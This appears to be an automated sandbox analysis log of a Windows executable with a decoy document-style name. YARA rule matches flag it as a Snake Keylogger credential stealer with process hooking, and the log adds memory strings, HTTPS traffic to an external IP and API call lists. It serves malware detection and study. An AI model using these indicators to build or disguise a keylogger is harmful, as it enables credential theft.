                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/Google
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0Google
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DC8000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AA2000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromeGoogle
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DBA000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=backslash&sca_esv=620c24330b4497e4&sca_upv=1&ei=UDzhZpjjMZyIptQPqai-
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8backslash
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB3000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035AC1000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8https://www.google.com/search?q=ba
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=tedst&oq=tedst&gs_lcrp=EgZjaHJvbWUyBggAEEUYOdIBBzkwNGowajSoAgCwAgE&s
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedst
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DB0000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035DFE000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedst;
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtedst%26oq%3Dtedst%2
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.30:49820 version: TLS 1.2
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00404FC7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC7

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Drawing_Products_Materials_and_Samples_IMG.exe PID: 3392, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Drawing_Products_Materials_and_Samples_IMG.exe
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_004030EF EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030EF
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile created: C:\Windows\resources\0409Jump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011C1272_2_0011C127
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011D23B2_2_0011D23B
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_001173602_2_00117360
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011C4002_2_0011C400
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011D5132_2_0011D513
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011C6D12_2_0011C6D1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_001156FA2_2_001156FA
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011C9AB2_2_0011C9AB
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011EBD82_2_0011EBD8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011CC882_2_0011CC88
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_00112D742_2_00112D74
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_00116D682_2_00116D68
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011CF632_2_0011CF63
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_0011EBD32_2_0011EBD3
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A91E982_2_36A91E98
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A917B02_2_36A917B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A90B302_2_36A90B30
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A94C282_2_36A94C28
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A925802_2_36A92580
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A991582_2_36A99158
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9E2B52_2_36A9E2B5
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A91E892_2_36A91E89
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9E2C02_2_36A9E2C0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9DA012_2_36A9DA01
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9DA102_2_36A9DA10
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9DE682_2_36A9DE68
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9DE582_2_36A9DE58
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A917AD2_2_36A917AD
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A987A02_2_36A987A0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9EFB92_2_36A9EFB9
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A987972_2_36A98797
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9EFC82_2_36A9EFC8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A90B2B2_2_36A90B2B
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A98F382_2_36A98F38
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9E7092_2_36A9E709
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9E7182_2_36A9E718
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9EB602_2_36A9EB60
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9EB702_2_36A9EB70
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9C8A12_2_36A9C8A1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9C8B02_2_36A9C8B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A998802_2_36A99880
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9CCF72_2_36A9CCF7
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9F4202_2_36A9F420
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A94C232_2_36A94C23
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9003B2_2_36A9003B
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9F4132_2_36A9F413
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9F8672_2_36A9F867
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9F8782_2_36A9F878
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A998712_2_36A99871
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A900402_2_36A90040
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9D5AB2_2_36A9D5AB
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9D5B82_2_36A9D5B8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9CD082_2_36A9CD08
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9D1602_2_36A9D160
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A925712_2_36A92571
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_36A9D1532_2_36A9D153
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373623002_2_37362300
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37367B882_2_37367B88
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373693C02_2_373693C0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373685E82_2_373685E8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373653302_2_37365330
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373677302_2_37367730
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373653272_2_37365327
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373677202_2_37367720
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373657782_2_37365778
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37367B792_2_37367B79
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373627582_2_37362758
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373627482_2_37362748
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37362BB02_2_37362BB0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373693B02_2_373693B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37362BA72_2_37362BA7
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373657882_2_37365788
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37362FF82_2_37362FF8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37365BE02_2_37365BE0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37365BD12_2_37365BD1
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37366A282_2_37366A28
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373646282_2_37364628
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37366A1A2_2_37366A1A
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373646182_2_37364618
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37364A712_2_37364A71
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37366E712_2_37366E71
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37361A502_2_37361A50
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37361A402_2_37361A40
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3736B6B02_2_3736B6B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3736B6A02_2_3736B6A0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37361EA82_2_37361EA8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37361E982_2_37361E98
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37364A802_2_37364A80
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37366E802_2_37366E80
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373622EF2_2_373622EF
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373672D82_2_373672D8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37364ED82_2_37364ED8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37364EC72_2_37364EC7
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373672C92_2_373672C9
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37360D3F2_2_37360D3F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3736A9682_2_3736A968
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_3736A9592_2_3736A959
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_37360D482_2_37360D48
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 2_2_373611A02_2_373611A0
